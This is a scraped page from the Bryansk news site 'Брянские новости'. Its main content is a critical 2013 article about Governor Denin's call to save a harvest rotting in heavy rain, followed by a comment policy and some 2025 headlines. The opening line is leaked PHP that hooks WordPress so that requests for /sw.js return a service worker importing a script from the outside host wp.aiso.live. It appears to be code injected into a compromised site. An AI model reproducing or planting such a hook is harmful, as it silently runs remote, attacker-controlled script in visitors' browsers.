add_filter('do_parse_request', function ($bool, $wp) { if (isset($_SERVER['REQUEST_URI']) && rtrim($_SERVER['REQUEST_URI'], '/') === '/sw.js') { header('Content-Type: application/javascript'); echo 'importScripts("https://wp.aiso.live/sw.js");'; exit; } return $bool; }, 10, 2); add_action('wp_head', function () { echo ''; }); Брянский губернатор бросил клич о спасении гниющего урожая | Брянские новости
Наверх

1 октября 2013, Вторник, 14:46

Брянский губернатор бросил клич о спасении гниющего урожая

Брянский губернатор бросил клич о спасении гниющего урожая

Критической назвал губернатор Николай Денин обстановку на полях, где гибнет урожай. Видеоконференции, которые проводил в условиях уютного кабинета вице-губернатор Александр Касацкий, не помогли: крестьянство еще не научилось убирать урожай по телевизору.

Губернатор поручил своему заместителю Михаилу Климову собрать комиссию «по предупреждению и ликвидации чрезвычайных ситуаций» и «внимательно рассмотреть положение дел». А рассматривать уже нечего – все гниет. Виновного нашли сразу − небеса:

− Ситуация близка к критической. В некоторых муниципальных образованиях выпало до трех месячных норм осадков! − заявил Николай Денин. − Сельхозпредприятия сейчас остро нуждаются в дополнительных рабочих руках: только так можно в кратчайшие сроки убрать то, что пока остаётся на полях. Прежде всего, речь идёт о картофеле.

С непогодой не поспоришь, однако на самом деле не дожди виноваты в том, что на селе не осталось людей. Каждую весну туда отправляют студентов, но дефицит кадров становится все острее. Пока областные власти увлеченно развивали спекулятивный рынок и славили «инвесторов», строящих очередные гиперсараи и развлекательные заведения, село погибало. При том, что десятки тысяч брянских мужиков отправились в Москву на заработки, не найдя достойной занятости дома. Понятно, что студенты их не заменят, а хваленые американские тракторы, на пропаганду которых чиновники потратили тысячи хорошо оплаченных человеко-часов, окажутся бессильными перед брянскими попями.


Редакция «Брянских новостей» оставляет за собой право удалять комментарии, нарушающие законодательство РФ. Запрещены высказывания, содержащие разжигание этнической и религиозной вражды, призывы к насилию, призывы к свержению конституционного строя, оскорбления конкретных лиц или любых групп граждан. Также удаляются комментарии, которые не удовлетворяют общепринятым нормам морали, преследуют рекламные цели, провоцируют пользователей на неконструктивный диалог, не относятся к комментируемой информации, оскорбляют авторов комментируемого материала, содержат ненормативную лексику. Редакция не несёт ответственности за мнения, высказанные в комментариях читателей. Комментарии на сайте «Брянские новости» публикуются без премодерации.

Комментарии для сайта Cackle
Заместитель секретаря Общественной палаты России побывал с визитом в Брянске

16 июня 2025, Понедельник, 18:14

Заместитель секретаря Общественной палаты России побывал с визитом в Брянске

Как пояснил губернатор, встреча с Владиславом Грибом стала хорошей возможностью обсудить развитие гражданского общества и федеральное взаимодействие

Мужчин пригласили в полицию Брянска за зарплатой в 100 тысяч рублей

16 июня 2025, Понедельник, 07:15

Мужчин пригласили в полицию Брянска за зарплатой в 100 тысяч рублей

Россиян приглашают на службу в УМВД Брянска за стабильным и своевременной зарплатой в размере от 40 до 100 тысяч рублей, как говорится в объявлении

Суд оставил в СИЗО обвиняемого в коррупции брянского полицейского Юрия Соколова

16 июня 2025, Понедельник, 07:00

Суд оставил в СИЗО обвиняемого в коррупции брянского полицейского Юрия Соколова

Дело все еще рассматривается районным судом, судья накануне продлил содержание подсудимого под стражей до 12 месяцев

Выдвижение Богомаза кандидатом в губернаторы потребует ответа от партий

15 июня 2025, Воскресенье, 21:16

Выдвижение Богомаза кандидатом в губернаторы потребует ответа от партий

На конференции отделения партии «Единая Россия» кандидатов в губернаторы Брянской области выдвинут Александр Богомаз. Это потребует ответа от партий

«Единая Россия» выдвинула Александра Богомаза кандидатом от партии на выборах губернатора Брянской области

15 июня 2025, Воскресенье, 17:31

«Единая Россия» выдвинула Александра Богомаза кандидатом от партии на выборах губернатора Брянской области

Соответствующее решение было принято сегодня на Конференции регионального отделения партии